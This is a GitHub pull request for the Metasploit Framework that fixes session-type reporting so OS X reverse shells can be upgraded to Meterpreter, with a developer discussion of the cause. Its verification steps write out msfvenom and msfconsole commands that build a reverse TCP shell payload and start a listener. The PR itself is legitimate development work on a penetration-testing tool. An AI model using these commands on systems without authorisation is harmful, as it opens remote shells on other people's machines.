Skip to content

fix #10576, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells#10584

Merged
busterb merged 2 commits intorapid7:masterfrom
timwr:fix_10576
Sep 6, 2018
Merged

fix #10576, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells#10584
busterb merged 2 commits intorapid7:masterfrom
timwr:fix_10576

Conversation

@timwr
Copy link
Contributor

@timwr timwr commented Sep 4, 2018
edited by busterb
Loading

Verification

List the steps needed to make sure this thing works

  • msfvenom -p osx/x64/shell_reverse_tcp LHOST=HOST LPORT=4444 -f macho -o osxshell
  • msfconsole -qx "use exploit/multi/handler; set payload osx/x64/shell_reverse_tcp; set lhost HOST; set lport 4444; set ExitOnSession false; run -j"
  • Execute the macho to get a shell session
  • sessions -u 1 on the session
  • Verify you get a meterpreter session

I'm still working on why the upgrading of sessions is not working for osx/x64/shell_reverse_tcp, as it seems to work if you upgrade a python shell, python meterpreter, or native meterpreter session on osx.

@timwr
Copy link
Contributor Author

timwr commented Sep 4, 2018

So the reason why the upgrade isn't happening is because cmd_exec on a osx/x64/shell_reverse_tcp session does nothing currently. For some reason these sessions are being reported as session.type basic:
Which means:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/common.rb#L84
doesn't invoke session.shell_command_token.
I can fix this either by adding an else or when 'basic' clause to the case, e.g:
timwr@57e8454
or by ensuring that session.type is set to shell?

@timwr
Copy link
Contributor Author

timwr commented Sep 4, 2018

I think #10448 had a merge conflict, and the def type function was removed, (not to be confused with the def self.type function :trollface: )
Putting it back seems to fix the issue:

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         shell x64/osx               ...

Without the fix:

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         basic x64/osx               ...

@timwr timwr changed the title fix #10576, fix session upgrade HANDLE_TIMEOUT fix #10576, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells Sep 4, 2018
@busterb busterb self-assigned this Sep 5, 2018
@busterb
Copy link
Contributor

busterb commented Sep 6, 2018

Looks good, thanks @timwr

@busterb busterb merged commit c38a7e9 into rapid7:master Sep 6, 2018
busterb added a commit that referenced this pull request Sep 6, 2018
@busterb
Land #10584, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells
dd47606
msjenkins-r7 pushed a commit that referenced this pull request Sep 6, 2018
@busterb @msjenkins-r7
Land #10584, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells
1c05bb6
@acammack-r7
Copy link
Contributor

acammack-r7 commented Sep 7, 2018
edited by tdoan-r7
Loading

Release Notes

OS X command shells now have their session type set correctly to enable upgrading to native Meterpreter.

@timwr timwr mentioned this pull request Sep 12, 2018
Merged
8 tasks
@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Sep 12, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@busterb busterb

Labels

bug payload rn-fix release notes fix

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@timwr @busterb @acammack-r7 @tdoan-r7